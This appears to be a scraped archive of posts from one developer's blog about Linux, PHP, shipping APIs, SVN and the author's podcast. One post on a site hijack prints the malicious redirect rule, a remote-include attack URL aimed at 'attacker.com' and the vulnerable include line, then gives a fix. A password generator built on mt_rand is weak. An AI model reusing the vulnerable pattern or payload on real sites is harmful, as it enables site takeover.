Niche Alerts

These are alerts that I have setup so I can see if I am mentioned on twitter or if a general term is being talked about. Some of these keywords will generate tons of alerts. For the ones with many alerts I will usually scan these weekly to see any trending topics.

Google Alerts: Linux Google Alerts: Linux Howto Twitter Search: Nixtutor Twitter Search : Linux Twitter Search: Faceoff Podcast Technorati Search for: Linux Twitter Search: Rocketshipit - UPS, FedEx, USPS web shipping business that I do.

I also have some various work related niche alerts that I won’t list here.

Friend’s Blogs

Jade Robbins - All about my good friend Jade Robbins the co-host of Faceoff Show and founder of Montana Fragfest. Eric Wendelin’s Blog - I wrote a guest post for Eric a long time ago and been a subscriber ever since. He talks about, programming and productivity with open-source tools.

Linux

0ddn1x: tricks with *nix - A nice compilation of good linux articles across the net. Most of these come from social media sites. Adam’s Tech Talk, Linux HOWTOs & Discussion, PHP, MySQL BabloTech Debian Package of the Day - An excellent site. They definitely don’t post daily however. Linux * Screw Mark Shuttleworth (Founder of Ubuntu) - Posts are few and far between but are usually worth it. nixCraft Linux Sys Admin Blog - Nice alternative to Nixtutor. Usually Nix admin articles. Ubuntu Linux Help Werner’s Linux Blog MontanaLinux.org - If you live in Montana definitely consider subscribing to this feed.

General Tech

Lifehacker - Who doesn’t love lifehacker? My only complaint is that this feed can be overwhelming. (20+ a day) gHacks technology news Google Open Source Blog - I love open source. I love google. I love this feed.
Yet Another Technology Site PureRoon.co.uk Walker News

Gaming

Montana Fragfest - Jade Robbins runs this gaming site that is primarily for Montana residents but everyone is welcomed. If you play Team Fortress 2 we play every Monday and Thursday night.

Non Tech

Montana Mushrooms - The best damn mushroom blog in town. Seriously, if you think mushrooms are those little white things you buy in the store check this site out. The world of mushrooms is so much more.

Web Development

NETTUTS - Web development tutorials and links - Great in-depth articles on technology. I mainly use this feed to check what current web development trends are popular. David Walsh Blog - A Mootools evangelist and web developer. I have guest posted on David’s blog and also interviewed David on Faceoff show. CSS-Tricks - An awesome resource for CSS and general web development articles and screencasts.

Security

Schneier on Security - An author of many crypto books and creator of the two fish and blow fish crypto algorithms. SecurityFocus Vulnerabilities - A very verbose security vulnerability alert service.

Business and Marketing

Seth’s Blog - An amazing resource for marketing advice and theory. ProBlogger Blog Tips - The pro of blogging. Problogger, Darren Rowse.

Web Apps

I scan through these daily and pick only the best web apps that I can find. I then talk about these on our podcast: Faceoff Show. I highly recommend that you just subscribe to the podcast so you can skip the useless web apps and get detailed reviews of the good ones. Useful Tools Webware.com MoMB

Work

WorkAwesome - From the creator of Nettuts.

Check personal feeds to make sure they work

These are feeds that I have subscribed to only to make sure they are working. Most of these are sites/projects that I contribute to.

Comments for Mark Sanborn . net - The comments for this site. NixTutor - My blog about Linux Faceoff Show - A podcast I co-host about web apps, programming, and entrepreneurship. Issue updates for project ups-php on Google Code - An open source project regarding UPS shipping.

What else?

Did I miss something? Based on my feeds can you recommend a good feed I should subscribe to?

Twitter allows programmers and developers to interact with its service using its API. By sending small bits of XML code or POST data we can send updates or get our friend’s feeds. Fortunately Linux has some tools available to it that make this job easy.

To send a tweet from the Linux console all you have to do is send a small snippit of code through curl like:

curl -u email:password -d status="What is everyone's plan this weekend?" http://twitter.com/statuses/update.xml

To make it automated one time we use the ’at’ command.

Suppose we want to issue a tweet out tomorrow morning at 5:00am when our post is released. To do this we would issue the following command:

at 5am tomorrow

At this point you will be prompted with the at console. This is so you can execute multi-line commands.

Type the following replacing email and password with your own.

curl -u email:password -d status="What is everyone's plan this weekend?" http://twitter.com/statuses/update.xml

Then hit enter. To tell at that you are now finished writing commands do, ctrl+d

To see the current queue just type:

atq

If you made a mistake you can remove a task by id:

atrm 6

NixTutor

NixTutor is a new blog/tutorial site that I created to cater to those that love and use unix like systems. NixTutor will have full guides and indepth tutorials regarding various unix like topics including:

• Linux

• FreeBSD

• OpenBSD

• NetBSD

• Solaris

• Open Source Software

For Nix topics subscribe to the NixTutor RSS feed.

Faceoff Podcast

The faceoff prodcast is a new weekly podcast that me and my buddy Jade Robbins started that focuses on web technology.

Some of the topics that we have covered include:

• Frameworks

• Ruby on Rails

• Zend Framework

• Wordpress 2.7

• Firebug

• Personal Brand Image

• Negative Blog Comments

• Interesting people to follow on Twitter

• Web apps

• Music while programing

• ups-php

• ie7-js

To subscribe to the itunes compatible feed click here.

How about MarkSanborn.net?

This site will remain up and I will continue as usual to post on various technology topics; however, expect to see less Linux related posts as they will most likely make their way over to the new NixTutor site.

We opened a website up at faceoffshow.com Although the site is not quite up yet, expect a full feature site with proper itunes compatible feeds soon!

In the mean time you can download the podcast directly from here:

Episode 2:

Topics include:

• Technology people to follow on Twitter

• Web apps

• Music while programing

• ie7-js

• ups-php

• Desktop virtualization

Faceoff-002-FavoriteWebapps.mp3

Show Notes:

Gary Vaynerchucktwitter.com/garyvee garyvaynerchuk.com Matt Cutts - twitter.com/mattcutts mattcutts.com/blog IE 7 JS plugin

This was our first recording of any kind ever. Since this is our first podcast it is very amateur. There are times in the podcast where there is light swearing. The first recording was also not structured and was never really meant to be a podcast until we were done and had over an hour worth of material we wanted to share, so, please bare with us. We promise to have a more structured show for episode two.

If this is something you would like to see more of please let us know either by leaving a comment below or sending me or Jade Robbins an email.

Episode 1: 56:30

Topics include:

• Frameworks

• Ruby on Rails

• Zend Framework

• Wordpress 2.7

• Firebug

• Personal Brand Image

• Negative Blog Comments

Without further ado

Faceoff-001-Frameworks.mp3

You can listen to Episode 2 when you are done with this one.

For example the Zend Framework when downloaded contains a folder called, ’ZendFramework-1.7.2’. All the other files are contained under this folder. This is great but sometimes I want to extract the contents of the folder without the “container folder”.

This is how I used to extract the contents and remove the “container folder”:

tar -xvf ZendFramework-1.7.2.tar.gz

Get rid of the tarball…

rm ZendFramework-1.7.2.tar.gz

cd ZendFramework-1.7.2/

Which would result in:

Copy everything in the “container” folder and move it up a directory.

cp -rf * ../

Now I have found a better way…

A better way

The flag that I have learned is the strip flag. This will strip off the first directory and extract the rest.

tar -xvf ZendFramework-1.7.2.tar.gz --strip 1

The only thing now is… How do I tell if a tar contains a “container folder”?

Easy

tar -tf ZendFramework-1.7.2.tar.gz | head

This will list contents of the file ’ZendFramework-1.7.2.tar.gz’ showing only the first few lines.

What do you think? Is there an even better way?

If you are new to the UPS API first read this article, Mastering the UPS Shipping API: Getting Started. You will need to have access to UPS’s online web tools. You can register here.

Getting ups-php

The first step is to go and get ups-php. For this guide we will use the latest code by downloading it with svn.

mkdir ups-php svn checkout http://ups-php.googlecode.com/svn/trunk/ .

Once downloaded you will notice that there is a folder called tests inside of tests there are rates and tracking. In rates there is a file called test_shopRates.php. This file contains a working sample test code. Simply enter your UPS credentials and hit submit.

You will than have a big giant array with tons of information available to us.

Getting the correct values

With all this information what do we really need to get to the bottom of the line and display a simple dropdown with a couple of shipping options?

We need the total charge for the package:

And the UPS service code:

Now we have the required information. We know that the total charge for the package is in the hashed array:

$response['RatingServiceSelectionResponse']['RatedShipment'][0]['TotalCharges']['MonetaryValue']['VALUE'];

And that the UPS Service Code is in this hashed array:

$response['RatingServiceSelectionResponse']['RatedShipment'][0]['Service']['Code']['VALUE'];

Looping through all the available services

These values are nice but they only represent one of the available services that UPS offers. If you notice in the array hash reference above we have a [0] after [‘RatedShipment’]. This represents the first set in a group of multiple ”RatedShipments”.

We need to loop through all of them and display them like this:

$response = $upsRate->returnResponseArray();

foreach ($response['RatingServiceSelectionResponse']['RatedShipment'] as $service) {
    echo $service['Service']['Code']['VALUE']. '<br />';
    echo $service['TotalCharges']['MonetaryValue']['VALUE']. '<br />';
} 

This will print out all the UPS Service Codes with the total cost for the service. All we have to do now is add some HTML and put them in a drop down.

<select>
<?php $response = $upsRate->returnResponseArray();

foreach ($response['RatingServiceSelectionResponse']['RatedShipment'] as $service) {
    $serviceCode = $service['Service']['Code']['VALUE'];
    $totalCharges = $service['TotalCharges']['MonetaryValue']['VALUE'];

    echo "<option value=\"$serviceCode\">$serviceCode ($totalCharges)</option>";
} 
?>
</select>

You should end up with something like this:

From here all you have to do is convert the service codes to their respective names found in this article, Calculating UPS Shipping Rate with PHP. If you get stuck just go back to the example provided with ups-php, test_rates.php.

I’m always someone that is looking for a faster/better way of doing things and copying, pasting, switching screens, and navigating to a website is a huge waste of time. With pastebinit I can skip all of that and just type:

pastebinit myclass.php

And voila!

This is handy for me since I always do my development on a Linux machine with a console based text editor.

For the Debian/Ubuntu lovers you can install by doing:

apt-get install pastebinit

For other Linux distributions, you know the routine.

For you Windows guys get a real operating system or at the very least download PuTTY and SSH into a real operating system when developing.

To get the firewall for Windows you will need to download, Windows Support Tools. When installing make sure you select the complete option.

Security and Optimization

In the firewall world security and optimziation goes hand in hand. Spyware applications will absolutely eat a computer alive with useless communication and sneaky transfers. Turning off ports provides extra security and blocks these applications from communicating thus making your internet faster and reducing ping latency. In many games latency is the difference between life and death, especially in first person shooters. While playing these games you cannot afford to have other programs transferring data.

It is not always spyware causing problems, sometimes it is legitimate traffic simply running at the wrong times. Windows will decide to do an automatic update (if you have it turned on), or other applications you may installed might hog your bandwidth and sky rocket your ping times. With IPsec you can turn everything off except the game.

Disabling internet service

The following command will disable all outgoing traffic:

cd "c:\Program Files/Support Tools" ipseccmd -f [0=*:*:*]

Once everything is disabled you will want to allow outgoing traffic for your game. Simply add the port to the allow list like this:

ipseccmd -f (0=*:27016:TCP)

If you look up games by hostname/dns you will need to open up port 53 UDP as well.

Forcing Productivity

Maybe you just want to be more productive and don’t want to be distracted by IMs and the temptation to check your email. You can disable all traffic except SSH traffic port 22 for web development like this:

ipseccmd -f [0=*:*:*] ipseccmd -f (0=*:22:TCP)

To add access to FTP you can add:

ipseccmd -f (0=*:21:TCP)

If you wanted you could place these commands in a .bat file and have them run at specific intervals effectively turning off your internet at scheduled times.

Reverting changes

If you want to undo all the changes to the default firewall changes just throw down this command.

ipseccmd -u

So the page only appeared hijacked when the referral was coming from Google. The hijack could go unnoticed for months. You would either have to be googleing yourself or wait until a good samaritan sends you an email warning you of the problem. I must say this sort of attack is quite clever on the hijacker’s part. The hijacked page gets the original site’s page rank and Google visits while the site owner has absolutely no clue.

Fixing it

The first part of the problem was to fix the hijack. This was easily solved by simply deleting the .htaccess and restoring it with the original. The hacked .htaccess contained a redirect similar to something like this:

RewriteEngine On RewriteCond %{HTTP_REFERER} ^http://google\.com RewriteRule .* http://www.anotherdomain.com [R=301,L]

The second part of the problem was to find how the hacker was able to change the .htaccess. Since we don’t have access to shared hosting logs we were going to to have to do it the hard way.

We first tried a tool called, nikto. After running the tool it returned a myriad of potential problems that could have caused an attack, like old versions of PHP, old cgi scripts etc.. After thinking about it we thought that if it was the host’s fault there would be thousands of websites effected so we started digging into the code and found something interesting:

include_once("$_GET[page].inc.php");

This one liner was the culprit we were looking for. This segment of code was used to include some code based on the particular pages the user was on. The problem with it however is that it blindly accepts any value here. Remember the golden rule: Sanatize all input! Failure to sanitize this input led to an attacker able to do something like this:

http://www.domain.com/index.php?page=attacker.com/attack

He would then have a script at his site called attack.inc.php. The attacker knew that they needed the .inc.php extension because the when they passed, ’foobar’ through the page variable they got an error explaining that it wasn’t there. To prevent this knowledge you could supress the PHP error messages or use PHP required function instead and throw out a die statement. This would only provide obscurity however. We needed to eliminate the vulnerability with input sanitation.

To do this we used a simple regular expression that would only accept a-z and A-Z. This would prevent remote includes and path traversing.

<?php
function sanitizeInput($string) { 
    return preg_replace("/[^A-Za-z]/", "", $string); 
}  

echo sanitizeInput('blah123');     
?>

Remember to check over your code especially when getting input from the user. This is a very sneaky attack that would ruin your Google page rank and your traffic before you even noticed what was going on.

This password generator uses the Mersenne Twister algorithm to generate random digits. You can learn more about it at Wikipedia or on Makoto Matsumoto’s website.

<?php
function randomString($length = 10, $chars = '1234567890') {

    // Alpha lowercase
    if ($chars == 'alphalower') {
        $chars = 'abcdefghijklmnopqrstuvwxyz';
    }

    // Numeric
    if ($chars == 'numeric') {
        $chars = '1234567890';
    }

    // Alpha Numeric
    if ($chars == 'alphanumeric') {
        $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890';
    }

    // Hex
    if ($chars == 'hex') {
        $chars = 'ABCDEF1234567890';
    }

    $charLength = strlen($chars)-1;

    for($i = 0 ; $i < $length ; $i++)
        {
            $randomString .= $chars[mt_rand(0,$charLength)];
        }

    return $randomString;
}

echo randomString(8,'numeric');
?>

Syntax is randomString([int],[predifined | custom char set]);

For example to create an 8 character alpha numeric string you could use:

randomString(8,'alphanumeric');

Of if you wanted a string with only a small subset of characters you could use:

randomString(8,'abco0iLlI');

Do you use something similar?

Start off by making a file called, USPSLabel.php and copy and paste the code below and save it.

Then Change the userName variable with your USPS username and change the rest of the variables to match your label.

USPSLabel.php

<?php
function USPSLabel() {

// This script was written by Mark Sanborn at http://www.marksanborn.net
// If this script benefits you are your business please consider a donation
// You can donate at http://www.marksanborn.net/donate.

// ========== CHANGE THESE VALUES TO MATCH YOUR OWN ===========

$userName = ''; // Your USPS Username
$FromName = '';
$FromAddress2 = '';
$FromCity = '';
$FromState = '';
$FromZip5 = '';

$ToName = '';
$ToAddress2 = '';
$ToCity = '';
$ToState = '';
$ToZip5 = '';

$weightOunces = 5;


// =============== DON'T CHANGE BELOW THIS LINE ===============

$url = "https://Secure.ShippingAPIs.com/ShippingAPI.dll";
$ch = curl_init();

// set the target url
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);

// parameters to post
curl_setopt($ch, CURLOPT_POST, 1);

$data = "API=DeliveryConfirmationV3&XML=<DeliveryConfirmationV3.0Request USERID=\"$userName\">
<Option>1</Option>
<ImageParameters />
<FromName>$FromName</FromName>
<FromFirm />
<FromAddress1 />
<FromAddress2>$FromAddress2</FromAddress2>
<FromCity>$FromCity</FromCity>
<FromState>$FromState</FromState>
<FromZip5>$FromZip5</FromZip5>
<FromZip4 />
<ToName>$ToName</ToName>
<ToFirm />
<ToAddress1 />
<ToAddress2>$ToAddress2</ToAddress2>
<ToCity>$ToCity</ToCity>
<ToState>$ToState</ToState>
<ToZip5>$ToZip5</ToZip5>
<ToZip4 />
<WeightInOunces>$weightOunces</WeightInOunces>
<ServiceType>Priority</ServiceType>
<POZipCode />
<ImageType>PDF</ImageType>
<LabelDate />
</DeliveryConfirmationV3.0Request>";

// send the POST values to USPS
curl_setopt($ch, CURLOPT_POSTFIELDS,$data);

$result=curl_exec ($ch);
$data = strstr($result, '<?');
// echo '<!-- '. $data. ' -->'; // Uncomment to show XML in comments


$xmlParser = new uspsxmlParser();
$fromUSPS = $xmlParser->xmlparser($data);
$fromUSPS = $xmlParser->getData();

curl_close($ch);
return $fromUSPS;
}

class uspsxmlParser {

var $params = array(); //Stores the object representation of XML data
var $root = NULL;
var $global_index = -1;
var $fold = false;

/* Constructor for the class
* Takes in XML data as input( do not include the <xml> tag
*/
function xmlparser($input, $xmlParams=array(XML_OPTION_CASE_FOLDING => 0)) {
    $xmlp = xml_parser_create();
        foreach($xmlParams as $opt => $optVal) {
            switch( $opt ) {
            case XML_OPTION_CASE_FOLDING:
                $this->fold = $optVal;
            break;
            default:
            break;
            }
            xml_parser_set_option($xmlp, $opt, $optVal);
    }

    if(xml_parse_into_struct($xmlp, $input, $vals, $index)) {
        $this->root = $this->_foldCase($vals[0]['tag']);
        $this->params = $this->xml2ary($vals);
    }
    xml_parser_free($xmlp);
}

function _foldCase($arg) {
    return( $this->fold ? strtoupper($arg) : $arg);
}

/*
 * Credits for the structure of this function
 * http://mysrc.blogspot.com/2007/02/php-xml-to-array-and-backwards.html
 *
 * Adapted by Ropu - 05/23/2007
 *
*/

function xml2ary($vals) {

    $mnary=array();
    $ary=&$mnary;
    foreach ($vals as $r) {
        $t=$r['tag'];
        if ($r['type']=='open') {
            if (isset($ary[$t]) && !empty($ary[$t])) {
                if (isset($ary[$t][0])){
                    $ary[$t][]=array();
                } else {
                    $ary[$t]=array($ary[$t], array());
                }
                $cv=&$ary[$t][count($ary[$t])-1];
            } else {
                $cv=&$ary[$t];
            }
            $cv=array();
            if (isset($r['attributes'])) {
                foreach ($r['attributes'] as $k=>$v) {
                $cv[$k]=$v;
                }
            }

            $cv['_p']=&$ary;
            $ary=&$cv;

            } else if ($r['type']=='complete') {
                if (isset($ary[$t]) && !empty($ary[$t])) { // same as open
                    if (isset($ary[$t][0])) {
                        $ary[$t][]=array();
                    } else {
                        $ary[$t]=array($ary[$t], array());
                    }
                $cv=&$ary[$t][count($ary[$t])-1];
            } else {
                $cv=&$ary[$t];
            }
            if (isset($r['attributes'])) {
                foreach ($r['attributes'] as $k=>$v) {
                    $cv[$k]=$v;
                }
            }
            $cv['VALUE'] = (isset($r['value']) ? $r['value'] : '');

            } elseif ($r['type']=='close') {
                $ary=&$ary['_p'];
            }
    }

    $this->_del_p($mnary);
    return $mnary;
}

// _Internal: Remove recursion in result array
function _del_p(&$ary) {
    foreach ($ary as $k=>$v) {
    if ($k==='_p') {
          unset($ary[$k]);
        }
        else if(is_array($ary[$k])) {
          $this->_del_p($ary[$k]);
        }
    }
}

/* Returns the root of the XML data */
function GetRoot() {
  return $this->root;
}

/* Returns the array representing the XML data */
function GetData() {
  return $this->params;
}
}
?>

Then make another file and include the functions like this:

<?php
require('USPSLabel.php');

echo '<pre>'; print_r(USPSLabel()); echo '</pre>';
$USPSResponse = USPSLabel();
$USPSLabel = $USPSResponse['DeliveryConfirmationV3.0Response']['DeliveryConfirmationLabel']['VALUE'];
?>

Then use PHP’s base64_decode(); to convert the image to PDF and save it with fwrite.

Unfortunately the security on this domain won’t allow me to write out an fopen/fwrite statement without throwing out a 503 error. So you will have to look it up. It is about 3 lines of code.

You should end up with a a PDF label like the one to the right. There are options to specify the size and type of label for people with regular printers or thermal label printers.

This is basically just a sample of what you can do. Check out the USPS Webtools guide and just adapt the XML part of the code to your integration needs.

What is a Live CD?

A live cd is a temporary operating system that runs from a CD instead of a hard drive. This means that it doesn’t permanently effect your computer. When your computer is rebooted and the CD is ejected everything returns back to the way it was. Unless of course you want to use the Live CD to make changes to your computer, like fixing a computer that wont boot. Maybe you need to reinstall but you don’t want to loose those family pictures you saved. Maybe there is 4 minutes left on an Ebay auction and your computer wont boot.

What can you do with a Live CD?

Well you can use a live cd as a temporary operating system to get you by or use it as a tool to fix/maintain computers.

You can:

• Transfer files to another hard drive even if your computer doesn’t work

• Reset a Windows administrator password

• Reset a Linux root password

• Turn you computer into a temporary network assessment vulnerability toolbox

• Remove spyware without waiting 25 minutes to boot

• Scan for viruses, especially useful for when viruses take over anti-virus

• Try out an operating system before installing it

• Build your own Linux distribution

• Watch a movie at a friends house without worrying about codecs and DVD player software

• umm… You can do almost anything you could do on a regular OS

Getting a Live CD to Run

When you turn you computer on one of the first things it does it look for a medium to boot from. They have what is called a boot sequence. For example a computer could first try to boot from a floppy disk then if that fails try the cdrom then the hard drive. If all of them fail your computer will just sit at a blank screen. What we need to do in order to boot from a CD is tell the computer to first look at the cdrom before checking the hard drive. Sometimes this is done for you and all you have to do is put the CD in and restart the computer. Other times you have to hit a key like del to change the boot order.

Recommended Live CDs

Ubuntu Live CD Knoppix - One of the first live CDs. BackTrack - Ultimate security toolbox comes with every app you would ever need to test for security vulnerabilities. Clonezilla - Open source ghost replacement Windows Live CD - Run a “Windows like” operating system. This one is great for removing spyware and virus scanning.

Comprehensive list of all Live CDs

So there you have it. Don’t feel intimidated if this is you first time learning about live cds. Just download one burn it to a CD and give it a whirl. You literally can’t mess up your computer without actually knowing how to. Live CDs can be a great emergency situation and a way to learn Linux without jumping into the deep end. If you are a live cd veteran check out the list of Live CDs. You might find something new.

Why a framework?

If you haven’t tried a framework for web development do yourself a favor and just go try one. Adding skills to your skill set will help you in future projects. You may find yourself forced to work on a framework in the future so why not get a head start and learn one.

They say a good programmer is a lazy one. Why reinvent code? Why come up with custom code that other programmers will have to decipher when it comes maintenance time. Why not have code that is already well documented and widely known. Why not allow someone else to research the industry standard way of doing the mundane tasks while you focus on the real programming?

Why not Ruby on Rails?

Ruby on Rails is a very popular framework for the ruby language. I decided against using this as I wanted to leverage my experience in PHP with a PHP framework. It only made sense to do this. The other reason I did not go with Ruby is that it is not as well supported by webhosts. For me it just doesn’t make sense to learn Ruby right now.

Why not cakePHP?

Actually CakePHP was the first framework I tried and I really thought I was going to use this one. As newbie to the MVC model of programming I simply couldn’t follow the documentation. After searching around I found Zend Framework. I started going through the tutorials and watching a few screencasts. Something finally clicked and I was able to start the learning process and do some trial and error.

It wasn’t until I had already invested some time into the framework and spoke with a friend learning both Ruby on Rails and Cake PHP that I learned why I prefer this framework. The Zend Framework is actually not really much of a framework at all. Out of all the PHP frameworks Zend is probably the lest automated. It is more accurately described as a library of common PHP functions.

Unlike cakePHP Zend doesn’t setup database connections or really do much automatic code generation. It sets up the MVC model and that is about it. This provides a little more flexibility with your code. This advantage however is also Zend’s disadvantage. It means that you will spend more time building your prototype.

Why Zend?

The first thing that drew me into the Zend Framework was the fact that is was made the people that create and maintain PHP. This means this framework is here for the long haul and isn’t going anywhere soon. It also has some major players on board, IGN.com, RottenTomatoes.com, AskMen.com and IBM all use the Zend Framework.

Conclusion

Traditional PHP developers will fit right in with Zend as it is just a library of great functions. CakePHP is suited for people that are basically looking for a Ruby on Rails clone for PHP. I think all the framework’s really do the same thing and learning whichever one fits your specific need is the one you should choose. I chose Zend Framework because it fits my style. There might be a better framework to try, just do a quick search and see where it takes you.

A lot of times people will use a regular expression like:

(\w+@[a-zA-Z_]+?\.[a-zA-Z]{2,6})

This regular expression would work for almost all email addresses but would fail for others. For example mark@gmail.co.uk would not match. Either would mark+spam@gmail.com. Which by the way is a very useful feature for email hosts that support it.

Fortunately using my favorite PHP Framework, Zend Framework, we don’t have to reinvent the proverbial wheel.

Validating an Email Address with Zend Framework

$validator = new Zend_Validate_EmailAddress();
if ($validator->isValid($email)) {
    // email appears to be valid
} else {
    // email is invalid; print the reasons
    foreach ($validator->getMessages() as $message) {
        echo "$message\n";
    }
}

Although they managed to get the regex for validating emails correctly, this is not where the power of Zend lies. Zend gives you the ability to:

• Check if the hostname actually accepts email

• Configure which emails types you will accept

• Validate Top Level Domains

• Validate International Domains Names (for international characters)

If you ever look at a EAN-13 UPC barcode (on all retail products) you will notice there is a digit outside of the regular set on the right. If any digit is out of order or mistyped you can tell that the barcode is wrong based on this checksum. It also allows barcode readers the ability to “guess” what the barcode if part of the barcode got riped or damaged. This is also how PAR files can repair corrupt damaged or even missing files.

Credit cards use a checksum algorithm called the, Luhn Algorithm, invented by Hans Peter Luhn. This simple algorithm can check to see if a credit card number was accidentally mistyped. This is what Zend Framework uses as well.

Validating Credit Card Numbers with Zend Framework

Here is a quick validation using Zend Framework:

$validator = new Zend_Validate_Ccnum();
        if ($validator->isValid('8181876154321')) {
            echo 'valid';
        } else {
            // email is invalid; print the reasons
            foreach ($validator->getMessages() as $message) {
                echo "$message\n";
            }
        }

Although crucial information like bank passwords are transmitted through SSL (encrypted) almost all traffic is sent in plain text. For example this blog and all blogs running Wordpress don’t use SSL to encrypt the credential exchange. Thus if you were connected to a untrusted internet service like your neighbor’s wireless they could easily see your blog’s password. This is just one out of thousands of examples where personal information could be hijacked on the account of YOU hijacking their service.

The term for this is called “sniffing”. The third party would “sniff” the traffic and watch what you are doing. They can do this because by connecting to a someone’s internet you are transmitting your data through their devices. All traffic that is not encrypted could easily be logged and stored for later analysis. To further clarify the only traffic that is hidden from prying eyes is SSL or some other industry standard encryption. If you hijacked a WEP or WPA access point you are still vulnerable to sniffing attacks. Technically the third-party could still sniff your SSL data they just wouldn’t be able to tell what it was.

It gets worse

You may say, “Well when I hijack someone’s internet I just surf around and check my email and my bank uses SSL so I’m not really at risk.” The problem with this statement is that it assumes that you are actually going to your bank’s server when you try to login. When someone has the control over the internet connection they can alter the data that you receive as well as the data you send out thus your bank’s website maybe just a copy that submits your actual username and password to a third-party database. Not a difficult thing to setup with tools like curl, bind, and mysql.

What to do

Stop using someone else’s internet connection!

Other than moral reasons these reasons are enough for me to never use an untrusted wireless network. Especially since we know the dangers that are involved.

The first thing you should do as a wireless owner is secure it. Read my article on Wireless Network Security.

For those of you with wireless internet that you want to hide from prying eyes I recommend checking out fakeAP. It is capable of making 53,000 fake wireless access points.

If you are interested in how sniffing works see, Wireshark.

If you just want to have fun with the freeloaders you can flip their world upside down with this.

Download the .deb file from Adobe and install it like you normally do.

dpkg -i nameofdeb.deb

This will install the flash library file here: ’/usr/lib/adobe-flashplugin/libflashplayer.so’.

This package then copies this library to the directories of Netscape/Mozilla browsers like Firefox, but doesn’t do it for Opera.

To do it manually just execute this command as root:

sudo ln -s /usr/lib/adobe-flashplugin/libflashplayer.so /usr/lib/opera/plugins/libflashplayer.so

Thats it.

If you are new to regular expressions first check out, Learning Regular Expressions For Beginners: The Basics. It will run your through your first example. Once you have the hang of it you can come back here and build a test program to practice your own regular expressions.

Regular Expression testing for Perl

Just open up a text editor and copy and paste the code below. To use it just replace the part that says, ”YOUR_REGULAR_EXPRESSION_GOES_HERE”. Each new line that you type into the console will be tested. Use ctrl+c to quit.

#!/usr/bin/perl
while (<>) {                        
  chomp;
  if (/YOUR_REGULAR_EXPRESSION_GOES_HERE/) {
    print "Matched: |$`<$&>$'|\n";  
  } else {
    print "No match: |$_|\n";
  }
}

|beforeafter|

Regular Expression testing for PHP

$testString = $_POST['testString'];
preg_match('/YOUR_REGULAR_EXPRESSION_GOES_HERE/', $testString, $matches);
print_r($matches);
?>

<html>
<head><title>Regular Expresion Tester</title></head>
<body>
<form action="" method="POST">
    <input type="textbox" name="testString" /><br />
    <input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>

With SVN you have version control where you can revert changes, kinda like Wikipedia. It also keeps track of which files were actually modified and gives you an option to describe to other developers what changes were made. No more unfortunate mishaps. :)

What is great about SVN is that the code can be checked out to any server at any time with the latest code. I use SVN to make a “sandbox” server. A server that I can play around in without worrying about deleting code or messing something up. When I am happy with my changes I can type one command and the two servers are synced with the newest changes. If for some reason it doesn’t work out I can revert back to the old way in one easy command.

If you are using Dreamhost it is really easy to setup. Here is how:

Setting up SVN on Dreamhost

Go to dreamhost and make a svn.yourdomain.com directory

Make a svn project

Import your code to the SVN repository.

cd yourdomain.com svn import . http://svn.yourdomain.com/myproject

Make a new folder

mkdir yourdomain.com-svn

Check out the code

cd yourdomain.com-svn svn checkout http://svn.yourdomain.com/myproject . <----- don't forget the dot

At this point you swap the original site with the svned one. If you didn’t do something write thus far simply swap them back and start over.

mv yourdomain.com yourdomain.com-original mv yourdomain.com-svn yourdomain.com

Make the Sandbox

Make a new subdomain called sandbox.yourdomain.com

Check out the SVN code

cd sandbox.yourdomain.com svn checkout http://svn.yourdomain.com/myproject .

Once again don’t forget the . (dot) at the end.

Lock the testing site

You probably don’t want people checking out your test site and certainly don’t want Google or any other bot to get a hold of it.

Open/create up your .htaccess in sandbox.yourdomain.com and fill it with:

AuthType Basic AuthUserFile /home/yourname/sandbox.yourdomain.com/.htpasswd AuthName "My Testing Site" require valid-user

Then create a .htpasswd file.

Ignore test files

You definitely don’t want to accidentally lock your main site down by transferring .htaccess files or anything else over that doesn’t belong.

Fortunately for use SVN provides the ignore command. You can insert multiple lines from the commandline, just press enter inside the quotes:

`$ svn propset svn:ignore ‘config.php [enter]

database.php’ . [enter]`

Note: If a file is already in the SVN it cannot be ignored. You must first delete it out. A good way to do this if your live site already has a .htaccess in SVN is to rename svn delete and then ignore then rename it back.

Using SVN

Although SVN is simple I could probably spend an entire post talking about it. Here are some of the basic commands that you will need to know.

Commit code to the SVN repository:

svn commit

Update code to match the SVN repository (run this on the live server after you commit from testing):

svn update